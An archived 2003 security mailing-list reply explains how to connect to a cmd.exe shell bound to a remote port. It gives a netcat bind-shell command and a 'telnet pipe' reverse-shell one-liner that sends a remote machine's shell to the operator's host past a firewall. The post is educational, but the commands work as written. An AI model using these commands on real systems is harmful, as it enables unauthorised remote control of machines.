Home page logo

basics logo Security Basics mailing list archives

Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?
From: DownBload <downbload () hotmail com>
Date: 8 Nov 2003 10:20:41 -0000

In-Reply-To: <20031106153902.26988032.mspencer () evidentdata com>

From: "Mark G. Spencer" <mspencer () evidentdata com>
I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine.  
I'm curious, how would someone connect to these shells?  The code looks very compact, I wouldn't imagine you could 
just http to the port bound with cmd.exe?  Perhaps telnet?  Is this how Code Red and Nimda were operating?

The best tool for such things is NetCat. 
Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have shell on tcp port 31337.  When you want to connect 
to that host and port, use again NetCat, but now as 'nc.exe remote_host.com 31337' and you have shell.

In some cases (like with firewalled machines) you can use "telnet pipe" technique to bypass firewall.

First run two instance of nc.exe on your machine, like this:
nc.exe -l -v -p 31337
nc.exe -l -v -p 31338
(each in spearated window)

Now on remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"
Write commands in first window on your machine, and output will be in second window.

DownBload / Illegal Instruction Labs
Security Research & Education
  ,     ,  
 /|     |\ 
 \\.....//  "Born under the lucky star magical,
  |.\ /.|    but on this earth generally tragical."
Check our wargame: http://www.ii-labs.org/wargame/

The Presidio integrates PGP data encryption and XML Web Services security to 
simplify the management and deployment of PGP and reduce overall PGP costs 
by up to 80%.
FREE WHITEPAPER & 30 Day Trial - 

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]